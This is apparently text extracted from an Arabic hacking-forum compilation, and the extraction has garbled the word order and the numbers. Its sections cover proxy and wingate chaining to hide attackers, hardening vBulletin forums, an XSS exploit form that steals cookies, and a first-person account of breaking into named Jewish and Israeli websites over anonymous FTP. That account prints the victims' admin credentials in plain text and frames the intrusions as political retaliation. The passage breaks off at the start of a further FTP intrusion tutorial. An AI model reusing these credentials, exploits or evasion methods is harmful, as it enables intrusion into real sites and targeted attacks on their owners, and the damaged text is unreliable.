‫عنوان‪ ‬‬ ‫ن‬ ‫أفضل طريقة للحصول على ھذا الشيء ھو كلمة بالفم ‪ .‬بإمكانك تاخذ‬ ‫م‪ ‬‬ ‫‪ wingate‬من أصدقائك إذا كان أحد عنده ‪ .‬الشيء الثاني أقترح علیك تستخدم‬ ‫برامج‪ ‬‬ ‫ج‬ ‫‪ WinGate Scanner‬‬ ‫‪ google‬‬ ‫‪g‬‬ ‫ھنالك العديد منھا بالنت ابحث فقط في‬ ‫‪ /http://www.google.com‬‬ ‫ث‪ ‬‬ ‫كل ماعلیك فعله ھو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬ ‫مثل اقترح علیك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقیا وأخیراا‬ ‫شبكة (@)‪ home‬كلھم يتشابھون ولديھم صفات شائعة وھي‪ ::‬‬ ‫‪ 142‬‬ ‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة ھناك ‪ wingate‬مفتوح قلیل على‬ ‫ى‬ ‫‪NetWork‬حقھم‪ ....‬‬ ‫خلل ‪ Unix‬أفضل طريقة ھي‪ :‬المحاولة والخطأأ‪ ‬‬ ‫‪ Trial and Error‬‬


‫‪ 32‬‬ ‫اتصل بالتلنت في ‪ wingate‬من المنفذ ‪3‬‬ ‫واذا لقیت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك‬ ‫ك‬ ‫‪ Anonymously‬‬ ‫‪A‬‬ ‫تجربة اسمك وكلمة سرك او تستخدم میزة) ‪ Guest‬الضیف) أوو‬ ‫‪ Introduction to Socks Host‬‬ ‫‪ Socks Host‬‬ ‫‪S‬‬ ‫)=الدخول أو الدخال إلى=(‬ ‫ن‪ ‬‬ ‫‪Socks Host‬تقريبا مثل ‪ WinGate‬لكن الختلف وھو ان السوكس يتصل من‬ ‫ح‪ ‬‬ ‫خلل المنفذ ‪ 0801‬وبإمكانك عمل العدادات علیھا وھي تتوفر في المتصفح‬ ‫‪ explorer and netscape‬‬ ‫‪ Socks Host‬‬ ‫‪S‬‬ ‫وبإمكانك إضافة‬ ‫ك‪ ‬‬ ‫وھ ذه الطريقة تستخدم كثیرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك‬ ‫‪ FireWall‬‬ ‫‪F‬‬ ‫وتعمل كـ‬ ‫**********************‪ ‬‬ ‫وية‪ ‬‬ ‫وھذه برامج مساعدة على بقائك مجھول الھ ة‬ ‫**********************‪ ‬‬ ‫برنامج ‪ GhostSurf‬الذي يجعلك تتصفح متخفیا (مجھول الھوية (‪ ‬‬ ‫‪ =[]=][Stealther‬‬ ‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجھول ‪ %001‬‬ ‫‪ 242‬‬ ‫؟!!‪ ‬‬ ‫كیف تبقى مجهول الهویة !‬ ‫الــ<>ــد<>ــر‪ ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫الثاني‪ ‬‬ ‫ي‬ ‫الجزء‬ ‫كالسابق‪ ...‬‬ ‫‪.‬‬ ‫ألحین الموضوع ھ ذا سوف يكون فیه تطبیق عملي ولیس‬ ‫ت‪ ‬‬ ‫ھذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على النترنت وقت‬ ‫ذا‪ ‬‬ ‫أطول أثناء اتصالك لكن لتظن ان ھذا الموضوع كافي فكلما قرأت عن ھ ا‬ ‫ول‪ ‬‬ ‫الجانب سوف تصبح الشخص المجھ ل‬ ‫‪ Telnet‬‬ ‫‪T‬‬ ‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجھول على‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ( ‬‬ ‫من المعروف أن أغلبكم يستخدم ‪ proxy‬لخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد‬ ‫د‬ ‫ويته‪ .‬‬ ‫‪.‬‬ ‫يستخدم البروكسي لكي يجتاز المواقع المغلقة وأيضا لحماية ھ‬ ‫‪ Ip‬‬ ‫لكن علیك ان تتعلم كیف تستخدم ‪ Proxy‬ومن الفضل ان تعرف ماذا ھو ‪I‬‬ ‫أول‪ ,,,‬‬ ‫‪,‬‬ ‫‪Address‬و ‪Domain‬‬ ‫‪ Proxy‬‬ ‫‪P‬‬ ‫قبل أن تقرأ ھ ذا الموضوع علي اول ان اقوم بإرشادك كیف تحصل على‬ ‫المواقع‪ :‬‬ ‫‪:‬‬ ‫مع تحديثھا من ھذه‬ ‫‪ http://www.multiproxy.org/anon_list.htm‬‬ ‫‪ /http://tools.rosinstrument.com/proxy‬‬ ‫أو ھ نالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪Group‬وھو يقوم بإرسال‬ ‫ل‬ ‫مختلفة‪ ‬‬ ‫ة‬ ‫بروكسیات جديدة جدا وبمنافذ‬ ‫‪ :P_R_O_X_Y(@)yahoogroups.com‬‬ ‫‪:‬‬ ‫ب‬ ‫الجروب‬ ‫التسجیل‪ ‬‬ ‫ل‬ ‫طريقة‬ ‫الطريقة‪ ‬‬ ‫ة‬ ‫قم بالدخول إلى حسابك وأرسل للجروب بھذه‬ ‫اكتب‪ ‬‬ ‫في خانة الرسال إلى ب‬ ‫‪ P_R_O_X_Y­subscriber(@)yahoogroups.com‬‬ ‫‪R‬‬ ‫‪Replay‬‬ ‫وأرسل رسالة فارغة إلیھ م بعد ذلك سوف تتلقى رد مباشرة قم بعمل‬ ‫بالجروب‪ ‬‬ ‫ب‬ ‫الن مبروك لقد سجلت‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ 342‬‬ ‫=========================‪ ‬‬ ‫أن‪ ‬‬ ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطیع التأكد من ن‬ ‫إلى‪ :‬‬ ‫‪:‬‬ ‫البروكسي يعمل بالذھاب‬ ‫‪ /http://www.privacy.net‬‬


‫أو‪ ‬‬ ‫‪ /http://www.proxytester.com‬‬ ‫وقد تعرف ھل عنوان ‪ Ip‬تغیر أم ل !!! ھذا بالنسبة للموقع الول أما الموقع‪ ‬‬ ‫الثاني فھو خاص لكشف البروكسیات واعطائك مستوياتھا‪ ..‬‬ ‫=========================‪ ‬‬ ‫*************************************‪ ‬‬ ‫&&&&&&&&&&&&&&‪ ‬‬ ‫‪ proxy server‬‬ ‫&&&&&&&&&&&&&&‪ ‬‬ ‫ھو خادم ‪ Proxy‬يقوم بالتصال بین( ‪ : (WebSite,IRC Chat,etc‬‬ ‫ھذه البروكسیات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم‪ ‬‬ ‫موقعا على النترنت البروكسي يرسل طلبك على النترنت لكي يطلب ھذا‪ ‬‬ ‫الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وھذا سوف يخزن في ‪ Proxy‬‬ ‫‪ Server‬‬ ‫كما قلنا في الموضوع السابق‪ ...‬‬ ‫ھذي توضح كیف تتصل عن طريق البروكسي بالموقع‪ ‬‬ ‫‪ ][User]>>>>>[Proxy]>>>>>[Web Pages‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ Proxy Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫معناھا عدة بروكسیات وھذي طريقة فعالة جدا لكي تصبح مجھول الھوية حیث‬ ‫يمكنك ان تتصل بأكثر من بروكسي لكي تعرض موقع واحد‪ ‬‬ ‫مثال‪ /‬‬ ‫‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Desti‬‬ ‫‪ 442‬‬ ‫‪ ]nation‬‬ ‫يوضح ھ ذا المثال ان المستخدم اول علیه التصال بالبروكسي الول فالثاني‪ ‬‬ ‫فالثالث والرابع وأخیرا الھ دف مما يسبب بطأ في التصال‪ ‬‬ ‫‪ Destination = web page, Unix server, ftp server, etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي ھكر لیحفظ سريته اثناء‬ ‫الدخول إلى أي ‪ server‬مثل ‪ telnet, ftp, or http‬‬ ‫‪Chaining‬ھي مھمة كما أقول لن تصبح مجھول ‪ %001‬لكن حاول بقدر‪ ‬‬ ‫المستطاع على ان ل تمسك ويطادونك مثل السمكة لكن البروكسیات‪ ‬‬ ‫المتعددة صعب ان يكشفھا احدا لكن مثل حاولت تدخل على موقع بالـ ‪ftp‬راح‪ ‬‬ ‫يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‪ ‬‬ ‫‪Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا راح يكون ‪ proxy‬‬ ‫ھھھھھھھھه يعني على ھ ذا المنوال إلى ان يصل الى المستخدم لذلك عملیة‬ ‫‪Chaining Proxy‬عملیة مفیدة جدا ويصعب احدھم المساك بك‪ ‬‬ ‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى‬ ‫الحد المسموح به من تحمیل الملفات على البروكسي الخادم الي يحتوي‪ ‬‬ ‫على البروكسیات لذلك سوف تصبح ملفات ‪ Logs‬متجددة‪ ...‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ HTTP Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪HTTP chaining‬ھي نفس طريقة ‪ Proxy‬ويمكنك عملھا من مستعرضك وفي‪ ‬‬ ‫خانة ‪ Address‬‬ ‫مثال‪ :‬‬ ‫‪ http://proxy.magusnet.com/­_­http://www.google.com‬‬ ‫حركة جمیلة وجديدة (‪ )-_-‬لم ترونھا مسبقا صحیح!!!‪ ‬‬ ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل‪ :‬‬


‫‪ ­_­/http://proxy.server1.com/­_­http://proxy.server2.com‬‬ ‫‪ http://www.destination.com‬‬ ‫او يمكننا وضع عناوين بروكسیات بمنافذھا‪ ‬‬ ‫‪ http://anon.free.anonymizer.com/http://www.google.com‬‬ ‫‪ 542‬‬ ‫مثال آخر‪ ‬‬ ‫كإضافة علمة (‪ )/‬بین المواقع‪ ‬‬ ‫‪ http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.com‬‬ ‫= ‪proxy‬استبدله ببروكسي رقمي يكون أفضل لك‪ .....‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ Browser Chaining‬‬ ‫­­­­­­­­­­­­­­­­‪ ‬‬ ‫وھ و استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن‪ ‬‬ ‫‪ Internet Explorer‬لنه الكثر استخداما‪ ----‬‬ ‫ألحین مثل عندنا بروكسي‪ ‬‬ ‫‪ 08:32.421.432.312‬‬ ‫العنوان‪ 32.421.432.312:‬‬ ‫المنفذ‪ 08:‬‬ ‫ألحین كیف نحطھا بدال البروكسي الخاص بالـ ‪ISP‬أي مزد خدمة النترنت‪ ‬‬ ‫نروح عند‪ ‬‬ ‫أدوات‪ Tools‬‬ ‫خیارات إنترنت ‪ Internet Options‬‬ ‫بعدين اتصالت ‪ Connections‬‬ ‫تختار التصال الي تدخل في النترنت بعدين‪ ‬‬ ‫إعدادات ‪ Settings‬‬ ‫راح تجد‪ ‬‬ ‫) ‪Address‬العنوان(‪ ‬‬ ‫) ‪Port‬المنفذ(‪ ‬‬ ‫ونضعه بداله‪ ‬‬ ‫العنوان‪ 32.421.432.312:‬المنفذ‪ 08:‬وبعد كذا اضغط موافق و‪ ‬‬ ‫والحین نبغى نستخدم الستعراض المتعدد ‪ Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا‪ /‬‬ ‫‪:Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port‬‬ ‫‪ 08‬‬ ‫‪ 642‬‬ ‫‪ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫&&&&&&&&&&&&&&‪ ‬‬ ‫‪ Wingates‬‬ ‫&&&&&&&&&&&&&&‪ ‬‬ ‫‪Wingate‬ھو ‪ proxy server‬الذي ينزل في جھازه او جھازھا لیسمح بالفرد او‪ ‬‬ ‫بعدة أفراد لیأخذون مقاعدھم بالمنفذ خلل ‪(( 32‬منفذ ‪ Telnet‬العادي((‪ ‬‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل ‪ online‬لكي يتصلون به مباشرة‪ ‬‬ ‫او في وقت قصیر لتتعدى اليام لكن اعلم ان ھذا لیس من القانون وھنالك‪ ‬‬ ‫خصائص للـ ‪Admin‬تمنع من استخدام ‪ wingate‬على جھازه ھذا على حسب‪ ‬‬ ‫المدير ھل يفھم في ھذا المجال أم ل!!!!‪ ‬‬ ‫وھي عبارة عن ‪ ip‬أجھزة أو اسماء أجھزة تتصل من خللھا على المنفذ ‪ 32‬‬ ‫بأداة ‪ Telnet‬أو يمكنك من عمل بحث ببرامج‪ ‬‬ ‫‪ WinScan‬‬ ‫‪ Wingate‬‬ ‫‪ Download‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ Chaining Wingates Using Telnet‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ألحین راح نستخدم عدة ‪ Wingate‬كالسابق والدوات التي نحتاجھا‪ ‬‬ ‫ھي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الجھزة سوف تخلو من أھم ھذين‪ ‬‬ ‫الداتین إل نادرا‪ .....‬‬ ‫جمیع ‪ wingate‬تتصل عن طريق المنفذ ‪ 32‬لكن المنفذ لیس مھما لكني سوف‬ ‫أضیفھ ا لكم لكي تتعلموا فقط كیف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‪ ‬‬ ‫وھذا عنوان جھاز امكننا إحضاره‪ ‬‬ ‫ھو ‪ 031.911.331.16‬ومنفذه ‪ 32‬‬ ‫‪ 742‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪ :‬‬ ‫‪ 32 031.911.331.16 C:\WINDOWS>telnet‬‬ ‫لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‪ ‬‬ ‫بعد كذا سوف تتصل بالوين جیت مثل ھذا‪ ‬‬ ‫‪ 32 661.371.702.302 >Wingate‬‬ ‫بعدين تقدر تكرر العملیة اكثر من مرة ولكن مع تغییر العنوان يعني كذا‬ ‫‪ 32 54.99.71.312 >Wingate‬‬ ‫وأيضا اتصل مرة أخرى‪ ‬‬ ‫‪ 32 7.212.56.01 >Wingate‬‬ ‫ألحین بعد ماتتصل بأكثر من ‪ wingate‬اتصل بالموقع‪ ‬‬ ‫‪ WinGate>arbornet.org‬‬ ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‪ ‬‬ ‫‪ 32 031.911.331.16 C:\Windows> telnet‬‬ ‫‪ 32 661.371.702.302>Wingate‬‬ ‫‪ 32 761.81.542.531>Wingate‬‬ ‫‪ Wingate>m­net.arbornet.org‬‬ ‫‪ Connecting to host arbornet.org...Connected‬‬ ‫‪ 842‬‬ ‫طرق حمايه المنتدى‪ ‬‬ ‫للكاتب‪ HaCkErS:‬‬ ‫لسلم علیكم ورحمه االله حبیت اقدم موضوع سريع حول ترقیع الثغرات الجديده‬ ‫وحمايه منتديات فیبلیوتن‪ ‬‬ ‫اول شيء لزم تضع جدار نارى ( ‪ ( htaccess .‬على مجلد ‪ modcp‬ومجلد‪ ‬‬ ‫‪admincp‬ومجلد‪ includes‬‬ ‫يفضل تغیر اسم ‪ admincp‬و ‪ modcp‬حتى يعصب الوصول الى لوحه التحكم‪ ‬‬ ‫افتح ملف‪ config.php‬‬ ‫الموجود داخل مجلد‪ includes‬‬ ‫قم بتعديل اسماء المجلدات‪ ‬‬ ‫‪ ;'$admincpdir = 'admincp‬‬ ‫(م بتغیر اسم المجلد)‪ ‬‬ ‫‪ ;'$modcpdir = 'modcp‬‬ ‫(م بتغیر اسم المجلد)‪ ‬‬ ‫تروح لم لوحة تحكم الموقع السي بنل واضغط على ايقونه‪ ‬‬ ‫‪ password protect directories‬‬ ‫بعدين يطلع لك مجلدات موقعك حدد مجلد المنتدى‪ ‬‬ ‫اضغط على مجلد المنتدى‪ ‬‬ ‫ستفتح لك صفحه اخرى اختر المجلد الى تبي حمايته وھو مجلد المنتدى‪ ‬‬ ‫الذي غیرت اسمه اضغط علیه بعدين تفتح صفحة جديدة‪ ‬‬ ‫حط علمة صح في مربع القفل المغلق ومن ثم اضغط على‪ save‬‬


‫ارجع لنفس الصفحة بالضغط على زر‪ back‬‬ ‫الن نقوم بوضع اسم مستخدم وباسورد لحماية مجلد الدمین الجديد‪ ‬‬ ‫افعل ذالك واحفظ عملك‪ ‬‬ ‫‪ 942‬‬ ‫وكرر العملیه مع المجلد القديم الفارغ‪ admincp , modcp , incldes‬‬ ‫ثغره الھتمل ھي تلقائي مغلقه خاصیه الھ تمل لن الحتیاط واجب تأكد ول‪ ‬‬ ‫تسمح لكواد ھتمل في التواقیع‪ ‬‬ ‫ثغره اخر عشر مواضیع نزل مجلد اخر عشر مواضیع وابحث عن ھالكودين‪ ‬‬ ‫الخبیثین‪ ‬‬ ‫‪ $fsel‬‬ ‫‪ $ftitle‬‬ ‫احذفھم من الملف وخلص كذا رقعت تمام‪ ‬‬ ‫ثغرة ملف التعلیمات ‪ faq.php‬وھي ثغره من نوع ‪ Path Disclosure‬الحل احذف‬ ‫ملف ‪ faq.php‬من وجھه نظري ماله داعي‪ ‬‬ ‫واذا ملزم تبي السئلة الشائعه ادخل ‪ faq.php‬‬ ‫وابحث عن الكود ھذا‪ ‬‬ ‫‪ // initialize some template bits‬‬ ‫‪ ;'' = $faqbits‬‬ ‫‪ ;'' = $faqlinks‬‬ ‫حط تحته مباشرة ھذا الكود‪ ‬‬ ‫‪ // initialize some template bits‬‬ ‫‪ ;'' = $faqbits‬‬ ‫‪ ;'' = $faqlinks‬‬ ‫ثغره ‪ editpost.php‬معروفه من نوع ‪ CrossSite Scripting‬وھي خاصه لسرقة‪ ‬‬ ‫الكوكیز يقدر المخترق يدخل المنتدى بالكوكیز المسروق‪ ‬‬ ‫‪ 052‬‬ ‫طريقتي بالترقیع عد السماح بالعضاء بتعديل مواضیعھم وردودھم‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫تم اكتشاف ثغرة خطیرة فى منتديات ‪ 3vb‬‬ ‫ثغرة الرسائل الخاصة‪ ‬‬ ‫الصدارت المصابة ھى ‪ 5.0.37.0.3,6.0.3, 4.0.3 ,30.3‬‬ ‫للتأكد من وجود الثغرة اتبع التي‪ :‬‬ ‫قم بكتابة رسالة جديدة و ضع اسم المستلم و العنوان و في المضمون ضع‪ ‬‬ ‫الكود التالي‪ :‬‬ ‫‪><Script>javascript:alert(document.cookie);</Script‬‬ ‫طريقة الترقیع ‪- :‬وضعھا اخونا للعندلیب االله يجزاه خیر‪ ‬‬ ‫افتح ملف‪ private.php‬‬ ‫ابحث عن السطر التالیه‪ :‬‬ ‫‪// trim the text fields‬‬ ‫‪ ;)]'$pm['title'] = trim($pm['title‬‬ ‫‪ ;)]'$pm['message'] = trim($pm['message‬‬ ‫استبدلھا بالتي‪ :‬‬ ‫‪// trim the text fields‬‬ ‫‪ ;))]'$pm['title'] = trim(xss_clean($pm['title‬‬ ‫‪ ;))]'$pm['recipients'] = trim(xss_clean($pm['recipients‬‬ ‫‪ ;)]'$pm['message'] = trim($pm['message‬‬ ‫‪ 152‬‬ ‫احفظ الملف وقم برفعه‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ثغرة ملف‪ authorize.php ‬وھي ثغره من نوع‪ SQL Injection‬‬


‫ اسمع فیھا الظاھر حقت‬paypal ‫ھو ملف مال امه داعى خاص لشراء وبطاقة‬ ‫شراء من النترنت‬ authorize.php ‫ترقیعھا حذف ملف‬ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ ‫ جديدة جننت اصحاب المنتديات‬newreply.php ‫ثغره ملف‬ ‫الظاھر ھذه ھي الثغرة اللي جننت اكبر منتديات الھكر العربیة‬ :‫الصدارت المصابة ھي‬ VBulletin VBulletin 3.0 Gamma VBulletin VBulletin 3.0 beta 7 VBulletin VBulletin 3.0 beta 6 VBulletin VBulletin 3.0 beta 5 VBulletin VBulletin 3.0 beta 4 VBulletin VBulletin 3.0 beta 3 VBulletin VBulletin 3.0 beta 2 VBulletin VBulletin 3.0.1 Cross­Site Scripting Vulnerability‫و ھي‬ ‫ و الحل السلمي لھا تجديد اصدار المنتدى و‬newreply.php ...‫و الثغرة ھي‬ ..‫تغییره‬ While a user is previewing the post, both newreply.php and newthread.php do sanitize the input in 'Preview', but Edit­panel does 252 not. The result is that malicious HTML code can be injected through this hole. A page as below can lead a visitor to a Preview page that contains malicious code that performs a cross site scripting attack : html ‫ نحفظه على صفحه‬xss ‫و ھذا كود‬ <form action="http://host/newreply.php" name="vbform" method="post" style='visibility:hidden'> <input name="WYSIWYG_HTML" value="<IMG src="java_script_:alert(document.cookie)">"/> <input name="do" value="postreply"/> <input name="t" value="123456" /> <input name="p" value="123456" /> <input type="submit" class="button" name="preview"/> </form> <script> document.all.preview.click(); </script> .............................. ‫ملحظة على الجمیع سرعة الترقیة الصدارت الحدث فھو الحل المن لمثل‬ ‫ھذي الثغرات‬ ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ init.php ‫ثغره ملف‬ ‫شرح الترقیع اخوانا العندلیب االله يجزاك خیر‬ ‫ بعدين‬init.php ‫حمل ملف‬ ‫إبحث عن السطر التالیه‬ $datastoretemp = $DB_site­>query(" 253 SELECT title, data FROM " . TABLE_PREFIX . "datastore WHERE title IN ('" . implode("', '", $specialtemplates) . "')


‫;)"‪ ‬‬ ‫;)‪ unset($specials, $specialtemplates‬‬ ‫قم باستبداله بما يلى‪ :‬‬ ‫))‪ if(!is_array($specialtemplates‬‬ ‫;‪ exit‬‬ ‫;)(‪ $specialtemplate = array‬‬ ‫)‪ foreach ($specialtemplates AS $arrykey => $arryval‬‬ ‫{‪ ‬‬ ‫;)]"‪ $specialtemplate[] = addslashes($specialtemplates["$arrykey‬‬ ‫}‪ ‬‬ ‫"(‪ $datastoretemp = $DB_site­>query‬‬ ‫‪ SELECT title, data‬‬ ‫‪ FROM " . TABLE_PREFIX . "datastore‬‬ ‫)'"‪ WHERE title IN ('" . implode("', '", $specialtemplate) . ‬‬ ‫;)"‪ ‬‬ ‫;)‪ unset($specials, $specialtemplates, $specialtemplate‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫تم اكتشاف ثغرة امنیة في المنتديات للنسخة ‪ 7.0.3‬وماقبلھا وھذه الثغرة في‬ ‫خاصیة البحث‪ ‬‬ ‫قبل يومین طرحت الشركة تحديث أمني يحل مشكلة في نظام البحث‪ ‬‬ ‫وقد صرحت الشركة بأن ھذا الباتش خاص بالنسخة ‪ 7.0.3‬والصدارات السابقه‬ ‫لقراءة المزيد من التفاصیل‪ ‬‬ ‫‪ 254‬‬ ‫‪ 954331=http://www.vbulletin.com/forum/showthread.php?t‬‬ ‫يرفع الملف الى المجلد ‪ includes‬والموافقه على الستبدال‪ ‬‬ ‫الباتش ھنا‪ ‬‬ ‫‪ http://azizsoft.hala.cc/soft/functions_search.zip‬‬ ‫ھ ذي بعض طرقي في الحمايه واعترف انھا لیست حمايه كامله الى عنده‬ ‫اضافات يضیف واالله يوفق الجمیع‪ ‬‬ ‫‪ 552‬‬ ‫‪256 anonymous Access‬‬ ‫للكاتب‪ Fighter:‬‬ ‫دي طريقة بسیطة وسھ لة جدا ومش محتاجة أية تعقیدات بس حبیت أن أكتب‪ ‬‬ ‫عنھا علشان أوضح مدىسھ وله الختراق ( في بعض الحیان ! ) ‪ ..‬‬ ‫وكمان أنا حطیت شوية أمثلة (مواقع يھودية) للتطبیق علیھا‪ ...‬‬ ‫المھم‪ ،‬طبعا كلكم سمعتم عن ال ‪ anonymous Access‬في ال ‪ ، ftp‬وطبعا‪ ‬‬ ‫قرأتم العشرات من المواضیع عن كیفیة إستغللھا و إزاى (حسبما ھو مكتوب )‪ ‬‬ ‫تقدر أن تحصل على البسوردبكل بساطة من ‪ etc/passwd‬كله كلم إنتھى من‪ ‬‬ ‫زمان وصعب جداالعثور على ‪ host‬أوموقع يسمح لك بالحصول على ملف‪ ‬‬ ‫الباسوردبھذه البساطة ‪ ...‬‬ ‫الطريقة السھلة اللي عاوزأشرحھا ھي تطوير ل ‪ anonymous access‬بس‪ ‬‬ ‫ھذه المرة لختراق بعض المواقع والتي تعمل على الويندوز مش على الیونكس‬ ‫بس زي الطريقة القديمة‪ ...‬‬ ‫أنا إستخدمتھ ا في إختراق عدة مواقع السبوع الي فات ‪ ،‬كرد على المذابح‪ ‬‬ ‫التي وقعت أخیرا في فلسطین ‪ ،‬وبرده كرد على إختراق موقع طريق‪ ‬‬ ‫السلم‪ ....‬‬ ‫كل الي إنت محتاجه برنامج لل ‪) ftp‬أنا أرشح برنامج ‪ ، ( ws ftp‬وسكانر جید‪ ‬‬ ‫زي ‪ retina‬أو ‪ ) shadow‬ولو كان عندك لینوكس يبقى ‪ satan ، nesus، nmap‬‬ ‫أو‪ ( whisker‬المھم تعال نجرب على الموقع دا‪ ‬‬ ‫‪ http://jewishexponent.com‬ودا موقع جريده يھ وديه كبیره تصدر في‪ ‬‬


‫فیلدلفیا‪ ،‬بأمريكا‪ ...‬نعمل شوية سكان علیھم‪ ....‬يا االله ‪ ..‬عندھم ثغرة ‪ ،‬إسمھا‬ ‫‪، anonymous ftp access‬طیب نستفاد منھا إزاي والسرفر بتاعھم ويندوز‪ ‬‬ ‫‪ 0002‬؟‪ ‬‬ ‫بسیطه نعمل كونكت علیھ م برنامج الف تي بي بتاعنا ‪ ،‬‬ ‫أو كي عظیم إحنا الن في السرفر بتاعھم بنتفرج علىملفاتھم !!‪ ‬‬ ‫دا كمان عندھم فیلت ‪ ، Asp‬يعني ممكن نتفرج علیھا (دي كارثة كبیره إن‪ ‬‬ ‫ملفات ال ‪ Asp‬يطلع علیھ ا أحد بخلف الدمین ‪ ،‬علشان بكل بساطة ھذه‪ ‬‬ ‫الملفات تحتوي على معلومات حساسة عن كل شىء مكن أن تخیله ‪ ،‬وفي‪ ‬‬ ‫أغلب الحیان الیوزر نیم والباسورد بتاع الدمین) ‪ ..‬‬ ‫‪ 752‬‬ ‫طیب فین نلقي الباسورد ؟؟ روح علي الديريكتوري اللي إسمه ‪ ، jeadmin/‬‬ ‫وبعدين ھذا الملف ‪ ، adminLogin.asp‬نزله عندك في جھ ازك أو إفتحه أون لين‬ ‫عن طريق ‪، file preview‬ھتلقي السطر ده ‪ :‬‬ ‫‪ then "Y" = if processme‬‬ ‫‪ ("uid")uid = Request‬‬ ‫‪ ("pwd")pwd = Request‬‬ ‫‪ then "jeLU234rLlsd" = and pwd "jejanette" = if uid‬‬ ‫‪ "true" = ("admin")Session‬‬ ‫عندك الن الوجین نیم بتاع الدمین والباسورد بتاعه في خط واضح مش محتاج‬ ‫تعمل كراك لیه !!! ‪ ،‬وطبعا لو إنت بحثت في الملفات ھناك ھتلقي البیانات و‪ ‬‬ ‫الباسورد بتاع قواعدالبیانات عندھم‪ ....‬‬ ‫ونفس الحكاية برضه في ھذا الموقع ‪ www. berale.co.il‬وده بیعمل ويب‪ ‬‬ ‫ھوستینج ‪ ،‬ھتلقي ھناك مواقع كثیره نده زي ‪ ، ruppin.ac.il ، oh­no.co.il‬‬ ‫‪ meretz.org.il ، genie.co.il‬ومواقع كتیر تانیة بس أناماكانش عندي وقعت‪ ‬‬ ‫أشیك علیھم كلھم ‪ ..‬المھم الدمین ھناك قفل ال ‪ ، anonymous ftp access‬‬ ‫بس برضه ھانججیب الباسوورد !!‪ ‬‬ ‫الھ وست الرئیسي الرئیسي الي بي بتاعه ‪ 99.53.971.212‬طیب تعال نعمل‪ ‬‬ ‫كونكت على ‪ 001.53.971.212‬وھو ھوست فرعي تابع لنفس الشركة ‪ ..‬‬ ‫ھناك ممكن ندخل بال ‪ ، anonymous‬ونعد نلعب بالفايلت بتاعتھم لغاية ما‪ ‬‬ ‫نجیب الباسوورد الي ھو ‪ ... Password=tinplH|O‬‬ ‫نرجع تاني لھ وست الرئیسي ونعمل كونكت بس المرة دي بإستخدام ال نیت‪ ‬‬ ‫بايوز بورت ‪ 931‬و اللوجین نیم ‪ administrator‬والباسورد الي معاناه‪ ‬‬ ‫أتمنى ان اكون عرفت ان ابسط الموضوع والشرح ‪ ...‬‬ ‫وبالھناء والشفاء‪ ‬‬ ‫‪ 852‬‬ ‫الختراق عن طريق ال‪ FTP‬‬ ‫للكاتب‪ Turbo :‬‬ ‫احب ان اوضح فقط ان معظم المرات التي اخترقت بھا عن طريق ال ‪ FTP‬‬ ‫كانتبدون فائدة و ذلك لن الدخول ب ‪ FTP‬يتطلب يوزر نیك و باس و ھذا يحتاج‬ ‫الي كراكر و ل ان تدخل كا زائر و ل يحق لك سحب او ارسال فیلت‪ ‬‬ ‫و كأنك يا ابو زيد ما غازيت‪ ‬‬ ‫فارجو من كل المھتمین بالموضوع المشاركة للتعلم و نشر الفائدة‪ ‬‬ ‫أول و لنجاح القتحام يجب ان يكون لدى الضحیة البورت‪ ‬‬ ‫‪ 12‬‬ ‫مفتوح و ھو البورت الخاص بال‪ FTP‬‬ ‫و لتأكد من أن البورت مفتوح علیك ان تستعمل برامج السكان و ھي كثیرة و‬ ‫من 